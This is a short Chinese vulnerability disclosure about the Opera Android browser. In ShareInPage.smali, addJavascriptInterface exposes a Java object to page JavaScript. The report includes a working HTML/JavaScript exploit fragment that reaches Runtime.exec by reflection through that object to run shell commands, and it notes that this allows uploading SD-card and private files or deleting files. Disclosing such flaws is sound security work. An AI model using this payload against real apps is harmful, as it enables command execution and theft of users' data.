### 简要描述:
漏洞存在于欧鹏浏览器中,不需要root即可。
### 详细说明:
漏洞存在于欧鹏浏览器中,不需要root即可,addJavascriptInterface导出多处。
欧鹏浏览器,反编译后com/opera/android/share/ShareInPage.smali中,存在
const-string v1, "ShareInPage"
invoke-virtual {p1, v0, v1}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
这里使用导出的ShareInPage,还有其他导出到js的java类也可以使用,欧鹏浏览器导出了多处,都注意下吧。
构造exploit部分内容如下:(html文件)
<script>
function execute(cmdArgs)
{
alert(typeof(ShareInPage));
return ShareInPage.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
### 漏洞证明:
跟上一个漏洞一样,调用后可以执行命令,可以做很多事情,例如上传sd卡文件,上传私有目录下的可读文件、删除文件等等。
暂无评论